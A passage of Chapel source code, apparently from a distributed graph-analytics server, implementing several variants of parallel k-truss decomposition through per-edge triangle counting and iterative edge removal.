neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N1=0:int;
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var timer:Timer;
var k=kvalue;
var largest:int;
largest=Ne;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
//here we begin the first naive version
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
if (v1==v2) {
//writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
}
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//After Preprocessing
timer.start();
ConFlag=true;
while (ConFlag) {
ConFlag=false;
// first we calculate the number of triangles
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
TriCount[i]=0;
var uadj = new set(int, parSafe = true);
var vadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>0) ){
forall x in dst[beginTmp..endTmp] with (ref uadj) {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_iR[u];
endTmp=beginTmp+neiR[u]-1;
if ((neiR[u]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref uadj) {
var e=findEdge(x,u);
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ( (nei[v]>0) ){
forall x in dst[beginTmp..endTmp] with (ref vadj) {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
beginTmp=start_iR[v];
endTmp=beginTmp+neiR[v]-1;
if ((neiR[v]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref vadj) {
var e=findEdge(x,v);
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
if (! uadj.isEmpty() ){
var Count=0:int;
forall s in uadj with ( + reduce Count) {
//var e=findEdge(s,v);
if ( vadj.contains(s) ) {
Count +=1;
}
}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
EdgeDeleted[i] = k-1;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
if ( SetCurF.getSize()<=0){
ConFlag=false;
} else {
ConFlag=true;
}
SetCurF.clear();
var tmpi=0;
if (ConFlag==false) {
while tmpi<Ne {
if (EdgeDeleted[tmpi]==-1) {
ConFlag=true;
//k=k+1;
//break;
} else {
tmpi+=1;
}
}
if (ConFlag) {
k+=1;
}
if (tmpi>0) {
largest=tmpi;
}
}
N2+=1;
}// end while
timer.stop();
outMsg="After Truss Decomposition List Intersection, Max K ="+(k-1):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After Truss Decomposition List Intersection,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After Truss Decomposition List Intersection, Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After Truss Decomposition List Intersection, The largest k truss edges ="+(Ne-largest):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc TrussDecompositionListIntersection
//For undirected graph, use triangle search method.
proc TrussDecomposition(kvalue:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] atomic int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge: atomic int;
var timer:Timer;
var k=kvalue;
var largest:int;
RemovedEdge.write(0);
largest=Ne;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
//First off, we remove the duplicated and cycle edges. This is common for all methods.
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
// we can safely delete the edge <u,v> if the degree of u or v is less than k-1
// we also remove the self-loop like <v,v>
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//After Preprocessing
timer.start();
{
// first we calculate the number of triangles
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge with(ref SetCurF){
var sVadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var du=nei[u]+neiR[u];
var dv=nei[v]+neiR[v];
var sV:int;
var lV:int;
var ldV:int;
if ( du<=dv ) {
sV=u;
lV=v;
ldV=dv;
} else {
sV=v;
lV=u;
ldV=du;
}
// here we search from the vertex who has small degree
{
var beginTmp=start_i[sV];
var endTmp=beginTmp+nei[sV]-1;
if ((EdgeDeleted[i]==-1) && (sV!=lV) ){
if ( (nei[sV]>0) ){
forall x in dst[beginTmp..endTmp] with (ref sVadj) {
var e=exactEdge(sV,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
beginTmp=start_iR[sV];
endTmp=beginTmp+neiR[sV]-1;
if ((neiR[sV]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref sVadj) {
var e=exactEdge(x,sV);
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
if (! sVadj.isEmpty() ){
var Count=0:int;
forall s in sVadj with ( + reduce Count) {
var ds1=nei[s]+neiR[s];
var e:int;
if (ds1<=ldV) {
e=findEdge(s,lV);
} else {
e=findEdge(lV,s);
}
if ( (e!=-1) && (e!=i) ) {
if ( EdgeDeleted[e]==-1) {
Count +=1;
}
}
}
TriCount[i].write(Count);
// here we get the number of triangles of edge ID i
}// end of if
}//end of if EdgeDeleted[i]==-1
}// end of triangle counting
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
}
ConFlag=true;
while (ConFlag) {
// here we mark the edges whose number of triangles is less than k-2 as 1-k
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1]+neiR[v1];
var dv2=nei[v2]+neiR[v2];
var sv1:int;
var lv2:int;
var sdv1:int;
var ldv2:int;
if (dv1<=dv2) {
sv1=v1;
lv2=v2;
sdv1=dv1;
ldv2=dv2;
} else {
sv1=v2;
lv2=v1;
sdv1=dv2;
ldv2=dv1;
}
{
var nextStart=start_i[sv1];
var nextEnd=start_i[sv1]+nei[sv1]-1;
if (nei[sv1]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==sv1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( lv2!=v4 ) ) {
var dv4=nei[v4]+neiR[v4];
if (ldv2<=dv4) {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_iR[sv1];
nextEnd=start_iR[sv1]+neiR[sv1]-1;
if (neiR[sv1]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//sv1==v3
var v4=dstR[j];
var e1=exactEdge(v4,v3);// we need the edge ID in src instead of srcR
var tmpe:int;
if (e1!=-1) {
if ( (EdgeDeleted[e1]<=-1) && ( lv2!=v4 ) ) {
// we first check if the two different vertices can be the third edge
var dv4=nei[v4]+neiR[v4];
if ldv2<dv4 {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ( (EdgeDeleted[e1]==-1) && (EdgeDeleted[tmpe]==-1) ) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[e1].sub(1);
if TriCount[e1].read() <k-2 {
SetNextF.add((i,e1));
}
} else {
if ((EdgeDeleted[e1]==-1) && (i<tmpe)) {
TriCount[e1].sub(1);
if TriCount[e1].read() <k-2 {
SetNextF.add((i,e1));
}
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<e1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
}// end of affected edge search
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (EdgeDeleted[i]==1-k)) {//each local only check the owned edges
EdgeDeleted[i]=k-1;
}
}
}
}
SetCurF.clear();
// then we try to remove the affected edges
coforall loc in Locales {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall (i,j) in SetNextF {
if (xlocal(j,startEdge,endEdge)) {//each locale only check its owned edges
if (EdgeDeleted[j]==-1) {
EdgeDeleted[j]=1-k;
SetCurF.add(j);
}
}
}
} //end on loc
} //end coforall loc in Locales
RemovedEdge+=SetCurF.getSize();
tmpN2+=1;
SetNextF.clear();
}// end of while
//check if all edges have been removed
var tmpi=0;
while tmpi<Ne {
if (EdgeDeleted[tmpi]==-1) {
ConFlag=true;
k=k+1;
break;
} else {
tmpi+=1;
}
}
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
outMsg="After Truss Decomposition, Max K ="+(k-1):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After Truss Decomposition ,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After Truss Decomposition, Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc TrussDecomposition
//For undirected graph, using mix method.
proc TrussDecompositionMix(kvalue:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] atomic int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var timer:Timer;
var k=kvalue;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}// end of proc exatEdge(u:int,v:int)
//here we first remove the duplicated and cycle edges
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
//writeln("For k=",k," We have removed the edge ",i, "=<",v1,",",v2,">");
// we can safely delete the edge <u,v> if the degree of u or v is less than k-1
// we also remove the self-loop like <v,v>
if (v1==v2) {
//writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
}
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//writeln("After Preprocessing");
timer.start();
//we will try to remove all the unnecessary edges in the graph
//while (ConFlag) {
//we should not need the loop for non-naive version
{
// first we calculate the number of triangles
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge {
TriCount[i].write(0);
}
//forall i in startEdge..endEdge with(ref SetCurF){
forall i in startEdge..endEdge {
var u = src[i];
var v = dst[i];
var du=nei[u];
var dv=nei[v];
{
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>1) ){
//forall x in dst[beginTmp..endTmp] with (ref uadj) {
forall x in dst[beginTmp..endTmp] {
var e=exactEdge(u,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=v) && (i<e)) {
var e3=findEdge(x,v);
// wedge case i<e, u->v, u->x
if (e3!=-1) {
if (EdgeDeleted[e3]==-1) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
}
}
}
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[v]>0) ){
//forall x in dst[beginTmp..endTmp] with (ref vadj) {
forall x in dst[beginTmp..endTmp] {
var e=exactEdge(v,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",v," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u) && (i<e)) {
var e3=exactEdge(x,u);
if (e3!=-1) {
if ((EdgeDeleted[e3]==-1) && (src[e3]==x) && (dst[e3]==u) && (i<e3)) {
// cycle case i<e,i<e3, u->v->x->u
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
}
}
}
}
}
}
}
}// end of if du<=dv
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
}
//writeln("after Triangle coutning");
ConFlag=true;
while (ConFlag) {
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1];
var dv2=nei[v2];
{
var nextStart=start_i[v1];
var nextEnd=start_i[v1]+nei[v1]-1;
if (nei[v1]>1) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v2!=v4 ) ) {
//v1->v2, v1->v4
tmpe=findEdge(v2,v4);
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
//if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
if ((EdgeDeleted[j]==-1) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read()<k-2 {
SetNextF.add((i,tmpe));
//EdgeDeleted[tmpe]=1-k;
}
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_i[v2];
nextEnd=start_i[v2]+nei[v2]-1;
if (nei[v2]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v2
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v1!=v4 ) ) {
tmpe=exactEdge(v4,v1);
// cycle case v1->v2->v4->v1
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[j]==-1) && (i<tmpe) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) && (i<j) ) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
//check the case of x->v1 and x->v2
nextStart=start_iR[v1];
nextEnd=start_iR[v1]+neiR[v1]-1;
var dv1=neiR[v1];
var dv2=neiR[v2];
if ((dv1<=dv2) && (dv1>0)) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//v3==v1
var v4=dstR[j];
var e2=exactEdge(v4,v3);
if (EdgeDeleted[e2]==-1) {
var tmpe=exactEdge(v4,v2);
if (tmpe!=-1) {
if (EdgeDeleted[tmpe]==-1) {
TriCount[e2].sub(1);
if TriCount[e2].read() <k-2 {
SetNextF.add((i,e2));
}
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
} else {
if (dv2>0) {
nextStart=start_iR[v2];
nextEnd=start_iR[v2]+neiR[v2]-1;
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//v3==v2
var v4=dstR[j];
var e2=exactEdge(v4,v3);
if (EdgeDeleted[e2]==-1) {
var tmpe=exactEdge(v4,v1);
if (tmpe!=-1) {
if (EdgeDeleted[tmpe]==-1) {
TriCount[e2].sub(1);
if TriCount[e2].read() <k-2 {
SetNextF.add((i,e2));
}
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (EdgeDeleted[i]==1-k)) {//each local only check the owned edges
EdgeDeleted[i]=k-1;
}
}
}
}
SetCurF.clear();
coforall loc in Locales with (ref SetNextF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall (i,j) in SetNextF {
if (xlocal(j,startEdge,endEdge)) {//each local only check the owned edges
EdgeDeleted[j]=1-k;
SetCurF.add(j);
}
}// end of forall
}
}
SetNextF.clear();
tmpN2+=1;
}// end of while
var tmpi=0;
ConFlag=false;
//writeln("k=",k);
while tmpi<Ne {
if (EdgeDeleted[tmpi]==-1) {
ConFlag=true;
k+=1;
break;
}
tmpi+=1;
}
N2+=1;
}// end while
timer.stop();
outMsg="After KTruss Decomposition Mix , Max K ="+(k-1):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Decomposition Mix ,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Decomposition Mix ,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
